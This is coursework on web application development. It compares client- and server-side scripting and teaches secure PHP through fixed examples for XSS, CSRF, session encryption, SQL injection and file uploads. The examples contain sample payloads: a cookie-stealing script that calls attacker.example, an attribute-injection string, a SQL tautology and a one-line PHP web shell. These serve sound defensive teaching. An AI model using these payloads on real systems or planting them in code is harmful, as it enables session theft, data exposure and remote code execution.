Diploma in Computing and Systems Development
Unit Number and Title
Unit 35 Web Application Development
Functions of web applications are:
Major advantages of web applications are:
Client-side and server-side scripting differ in several ways. They can be compared as follows:
Client-side scripting language vs. server-side scripting language:

1. Purpose
   Client side: adds functionality to the website and makes web pages interactive in the browser.
   Server side: builds and structures the website itself. In PHP, content management systems such as Joomla and WordPress, and frameworks such as CakePHP, are available to structure the web application.

2. Where the code runs
   Client side: all scripts that run in the client's browser.
   Server side: all scripts that run on the web server.

3. Request and response
   Client side: the browser sends the request to the web server (e.g. www.yahoo.com) on behalf of the user.
   Server side: the web server receives the request and returns a response made up of headers (metadata about the page) and the page source itself.

4. Storage
   Client side: cannot reach the server's permanent storage; it works only with browser-side storage such as cookies.
   Server side: interacts with permanent storage such as databases and files.

5. What must be enabled
   Client side: the browser must have scripting enabled for the script to run, and the user can disable or modify it, so client-side checks can never be relied on for security; every check must be repeated on the server.
   Server side: nothing needs to be enabled in the browser; the server runs the script itself.

6. Visibility of the source
   Client side: the source code travels from the web server to the user's computer and runs in the browser, so the user can read it.
   Server side: the script runs on the web server and produces HTML, which is sent to the browser; the source never leaves the server. Typical examples are interactive sites where user input is saved to a database, such as sign-up and login forms.

7. Examples
   Server side: Java, the open-source PHP, Microsoft's ASP.NET and C#, Ruby on Rails, Visual Basic, C/C++, Delphi, Perl, etc.
The Internet has become a common medium for doing business and sharing information. To keep an application secure and less vulnerable to attack, a programmer must follow certain habits:
Cross Site Scripting (XSS) attacks – Attackers try to inject malicious script into vulnerable web pages, typically through form fields or URL parameters whose values the page echoes back into its HTML. The injected script then runs in other users' browsers with the site's privileges: it can steal session cookies, perform actions as the victim, or redirect the user to a phishing page. The defence is output encoding: every piece of untrusted data must be passed through htmlspecialchars() or htmlentities() (with ENT_QUOTES and the page's character set) at the point where it is written into HTML. strip_tags() is not a substitute, because it removes tags but not the quote characters that break out of an attribute, and it is not an HTML parser; use it at most for input clean-up, never as the XSS control.
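The following is an added example (not part of the original coursework) showing a vulnerable reflection, why strip_tags() is not enough, and the output-encoding fix. It assumes PHP 7 or later and a search page that echoes the q parameter back into its HTML; the payloads are constructed sample data.

```php
<?php
// Added example: reflected XSS, the strip_tags() trap, and output encoding.
// Assumes PHP >= 7.0 and a page that echoes the "q" parameter (assumption).

// Output-encoding helper: call it on every untrusted value at the point where the
// value is written into HTML. ENT_QUOTES also escapes single quotes, so the result
// is safe inside quoted attributes as well as in element text.
function e(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed attacker inputs, the kind that arrive in ?q=... (sample data).
$scriptPayload = '<script>location="https://attacker.example/?c="+document.cookie</script>';
$attrPayload   = '" autofocus onfocus="alert(document.cookie)';

// VULNERABLE: the raw value is concatenated into the page, so the browser runs
// the attacker's script with the victim's cookies in scope.
function render_vulnerable(string $q): string
{
    return '<p>Results for: ' . $q . '</p>';
}

// NOT SUFFICIENT: strip_tags() removes <script>...</script>, but the attribute
// payload contains no tag at all, so it passes through untouched and the result is
// <input name="q" value="" autofocus onfocus="alert(document.cookie)">
function render_stripped(string $q): string
{
    return '<input name="q" value="' . strip_tags($q) . '">';
}

// HARDENED: encode on output. The same helper neutralises both payloads because
// <, >, ", ' and & are converted to entities and the browser treats the result
// as text, never as markup or as the end of an attribute.
function render_safe(string $q): string
{
    return '<p>Results for: ' . e($q) . '</p>'
         . '<input name="q" value="' . e($q) . '">';
}

echo render_vulnerable($scriptPayload), PHP_EOL;  // script executes in a browser
echo render_stripped($attrPayload), PHP_EOL;      // still exploitable
echo render_safe($scriptPayload), PHP_EOL;        // rendered as literal text
echo render_safe($attrPayload), PHP_EOL;          // attribute stays closed
```

Encoding must match the context the value lands in: the helper above is correct for element text and quoted attributes, but a value placed inside a script block needs json_encode() with its HTML-safe flags instead, and a value used as a URL needs validation of its scheme.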
Cross Site Request Forgery (CSRF) attacks – The attacker tricks a logged-in user's browser into sending a request the user did not intend, such as a funds transfer or a change of e-mail address; the browser attaches the user's session cookie automatically, so the application cannot tell the forged request from a genuine one. Applications that perform such actions through GET requests are the easiest targets, because a single link or image tag is enough. To prevent this, every state-changing action must be a POST request that carries an anti-CSRF token. The application generates the token from a cryptographically secure random source at login (or when the session is created) and stores it in the session; every form that performs an action includes it as a hidden input field, and the application logic rejects any request whose token does not match the one held in the session.
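Here is the synchronizer-token pattern just described, as an added example rather than code from the original coursework. It assumes PHP 7 or later (for random_bytes) and a transfer form posted to /transfer; the route and field names are assumptions.

```php
<?php
// Added example: anti-CSRF token generated per session, embedded as a hidden
// field and checked on every POST. Assumes PHP >= 7.0; /transfer is an assumption.
session_start();

// Create the token once per session, from a cryptographically secure source.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every form that performs a state-changing action.
function csrf_field(): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

// Validate the submitted token against the one in the session. hash_equals()
// compares in constant time so the token cannot be recovered byte by byte.
function csrf_check(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // Token is valid: perform the transfer here. A form on an attacker's site
    // cannot read the victim's session, so it cannot supply this value.
}
?>
<form method="post" action="/transfer">
  <?= csrf_field() ?>
  <label>Amount <input name="amount"></label>
  <button type="submit">Transfer</button>
</form>
```

The token only helps if the action is never reachable by GET; an endpoint that accepts both methods can simply be called without the form. Regenerate the token (and the session ID) at login so a value captured before authentication is useless afterwards.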
Error messages – Error messages shown to users must be generic and must not reveal which part of the input was wrong. For a failed login, display 'Username or password incorrect' rather than 'username incorrect' or 'password incorrect', because the specific message tells an attacker which usernames exist.
Protect session data – Never store sensitive information such as passwords or credit card numbers in the session: by default PHP writes session data to plain files on the server, where anyone with access to the file system, including other applications on a shared host, can read it. If such state must be kept, encrypt it before it is written. In PHP 5.4 and above a custom session handler that implements SessionHandlerInterface (or extends the built-in SessionHandler class) can be registered with session_set_save_handler() to do this transparently.
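As an added example (not the coursework's own code), the following handler wraps PHP's default file-based session storage so that what reaches disk is authenticated ciphertext. It extends the built-in SessionHandler class, which already implements SessionHandlerInterface, and assumes PHP 7.2 or later for the sodium functions and a 32-byte key supplied in the SESSION_KEY environment variable; the variable name is an assumption.

```php
<?php
// Added example: encrypt session data at rest by wrapping the default handler.
// Assumes PHP >= 7.2 (sodium) and a key in SESSION_KEY (assumption).
class EncryptedSessionHandler extends SessionHandler
{
    private $key;

    public function __construct(string $key)
    {
        if (strlen($key) !== SODIUM_CRYPTO_SECRETBOX_KEYBYTES) {
            throw new InvalidArgumentException('session key must be exactly 32 bytes');
        }
        $this->key = $key;
    }

    // Decrypt on the way in. The stored layout is nonce || ciphertext.
    #[\ReturnTypeWillChange]
    public function read($id)
    {
        $raw = parent::read($id);
        if ($raw === '' || $raw === false) {
            return '';                       // new session, nothing stored yet
        }
        $nonce  = substr($raw, 0, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
        $cipher = substr($raw, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
        $plain  = sodium_crypto_secretbox_open($cipher, $nonce, $this->key);
        // Tampered, truncated or foreign data fails authentication: treat the
        // session as empty rather than trusting whatever is on disk.
        return $plain === false ? '' : $plain;
    }

    // Encrypt on the way out with a fresh random nonce for every write.
    #[\ReturnTypeWillChange]
    public function write($id, $data)
    {
        $nonce = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
        return parent::write($id, $nonce . sodium_crypto_secretbox($data, $nonce, $this->key));
    }
}

$hex = getenv('SESSION_KEY');   // 64 hex characters, e.g. from `openssl rand -hex 32`
if ($hex === false || strlen($hex) !== 64) {
    throw new RuntimeException('SESSION_KEY must hold a 64-hex-character key');
}
session_set_save_handler(new EncryptedSessionHandler(sodium_hex2bin($hex)), true);
session_start();

$_SESSION['user_id'] = 42;      // stored on disk as nonce || ciphertext, unreadable without the key
```

This protects the contents of the session file, not the session itself: the session ID cookie still has to be sent only over HTTPS and kept from scripts (session_set_cookie_params() with secure and httponly), and the key must live outside the web root and the code repository.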
Guessing passwords – Attackers guess passwords, and their guesses are good when they know the administrator's name, the product, or the database names in use. A password must be strong: at least 8 characters long and a combination of letters, numbers and special characters. Never use your own name, the site name or other things an attacker can see around the application, because these are guessed first.
SQL Injection attacks – Through SQL injection an attacker reads or modifies data in the database that the application never meant to expose. The attacker looks for a place where user input is pasted into an SQL query without being parameterised or escaped, then supplies input such as ' OR '1'='1 so that the quote closes the intended string literal and the rest of the input becomes part of the query, for example turning a login check into a condition that is true for every row. The defence is to use prepared statements with bound parameters (PDO or MySQLi) for every query that contains user-supplied values; escaping by hand is error-prone and must not be relied on.
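The injection above, carried through against a real query, as an added example that is not from the original coursework. It assumes PDO with the SQLite driver so that it runs offline against an in-memory database (an assumption; the same code works against MySQL or PostgreSQL with a different DSN), and the user rows are constructed sample data.

```php
<?php
// Added example: string-built query versus prepared statement.
// Assumes PDO + pdo_sqlite (assumption); rows below are constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL)');
$pdo->exec("INSERT INTO users (username) VALUES ('admin'), ('alice')");

// Constructed attacker input: closes the string literal and appends a tautology.
$attackerInput = "admin' OR '1'='1";

// VULNERABLE: the value is pasted into the SQL text, so the query that runs is
//   SELECT id, username FROM users WHERE username = 'admin' OR '1'='1'
// and the OR makes the WHERE clause true for every row in the table.
function find_user_vulnerable(PDO $pdo, string $username): array
{
    $sql = "SELECT id, username FROM users WHERE username = '$username'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: a prepared statement sends the query text and the value separately;
// the database never parses the value as SQL, so the quote has no special meaning
// and the whole string "admin' OR '1'='1" is simply compared against usernames.
function find_user_safe(PDO $pdo, string $username): array
{
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE username = ?');
    $stmt->execute([$username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

echo count(find_user_vulnerable($pdo, $attackerInput)), " rows from the vulnerable query (every user leaked)\n";
echo count(find_user_safe($pdo, $attackerInput)), " rows from the prepared statement (no such user)\n";
echo count(find_user_safe($pdo, 'admin')), " row for a legitimate lookup\n";
```

Bound parameters cover values only; table and column names or ORDER BY directions cannot be bound and must instead be checked against a fixed allow-list before being placed in the query text.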
Spoofing – An attacker can create an exact replica of a website and lure users into entering their confidential information into it, typically through hoax (phishing) e-mails that link to the copy. Users should be told to check the address bar and the certificate before entering credentials, and the application should never ask for credentials through links in e-mail.
Even if you think your website holds nothing of value to an attacker, you still have to be careful while building and maintaining it: every application on the Internet is probed continuously by automated attacks, and a compromised site is useful to attackers as a host for malware and phishing pages regardless of its own content. Some measures that must be taken to safeguard an online application:
Updating antivirus – Antivirus definitions must be updated regularly and scans run on the web server. The same discipline applies to the web server software, the PHP runtime and any libraries or CMS plug-ins the application uses, since known vulnerabilities in unpatched components are a common way in.
Secure Sockets Layer (SSL) certificate – SSL, and its successor TLS, is the standard protocol for protecting applications over the Internet. It establishes an encrypted, authenticated link between web server and web browser, so confidential information such as passwords and card numbers cannot be read or altered in transit. The server must present a certificate issued by a trusted certificate authority, and the whole application, not only the login page, should be served over HTTPS.
Secure file upload – If the application accepts uploads, it must not accept executable files or HTML files: an uploaded PHP script stored under the web root gives the attacker code execution on the server, and an uploaded HTML page can carry scripts that run in other users' browsers. Check the actual content of each file against an allow-list of permitted types, ignore the client-supplied name and extension, give the stored file a random server-chosen name, and keep uploads outside the web root or in a directory where execution is disabled.
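An added example (not the coursework's own code) of those checks for an image upload. The upload directory, size limit and allow-list are assumptions, as is PHP 7 or later with the fileinfo extension; the "image" used in the offline demonstration at the end is a constructed PHP web shell.

```php
<?php
// Added example: content-based upload validation. Paths, limits and the
// allow-list are assumptions; assumes PHP >= 7.0 with ext/fileinfo.
const UPLOAD_DIR = '/var/www/uploads';   // outside the document root (assumption)
const MAX_BYTES  = 2 * 1024 * 1024;
// Content types we accept, mapped to the extension WE assign on disk.
const ALLOWED_TYPES = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

// Content checks on a file already on disk. Returns [true, 'ok', ext] or [false, reason].
function check_upload_contents(string $path, int $size): array
{
    if ($size <= 0 || $size > MAX_BYTES) {
        return [false, 'size out of range'];
    }
    // Never trust the client's filename, extension or Content-Type: "shell.php",
    // "shell.php.png" and "page.html" arrive with whatever the attacker chooses.
    // Sniff the real content instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    if ($mime === false || !array_key_exists($mime, ALLOWED_TYPES)) {
        return [false, 'content type not allowed: ' . ($mime ?: 'unknown')];
    }
    // Second opinion from the image library: rejects files that merely start like an image.
    if (@getimagesize($path) === false) {
        return [false, 'not a parseable image'];
    }
    return [true, 'ok', ALLOWED_TYPES[$mime]];
}

// Full handler for one entry of $_FILES.
function handle_upload(array $file): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'upload failed with code ' . $file['error']];
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return [false, 'not an uploaded file'];
    }
    $check = check_upload_contents($file['tmp_name'], (int) $file['size']);
    if (!$check[0]) {
        return [false, $check[1]];
    }
    // Random server-chosen name plus our own extension: no path traversal, no
    // double extensions, and no way for the client to pick a name the server executes.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $check[2];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return [false, 'could not store file'];
    }
    return [true, $dest];
}

// Offline demonstration: a constructed "avatar.png" that is really a PHP web shell.
// The sniffed type is PHP source, not an image, so it is rejected whatever it was named.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "<?php system(\$_GET['cmd']); ?>");
print_r(check_upload_contents($tmp, filesize($tmp)));
unlink($tmp);
```

Validation on upload is only half of the control: the directory the files land in must also be configured so the web server never executes or interprets anything in it, and files should be served back with a fixed Content-Type and a Content-Disposition header rather than by direct path.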